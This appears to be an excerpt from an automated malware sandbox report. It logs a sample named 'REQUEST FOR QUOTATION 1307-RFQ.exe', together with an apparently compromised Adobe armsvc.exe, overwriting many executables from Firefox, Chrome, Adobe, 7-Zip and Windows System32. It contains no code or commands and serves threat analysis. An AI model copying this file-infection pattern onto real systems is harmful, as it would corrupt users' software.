              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\wbem\WmiApSrv.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\vds.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\7-Zip\7zFM.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\snmptrap.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\Spectrum.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\Locator.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\7-Zip\7z.exeJump to behavior
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\SysWOW64\perfhost.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\7-Zip\7zG.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\msiexec.exeJump to behavior
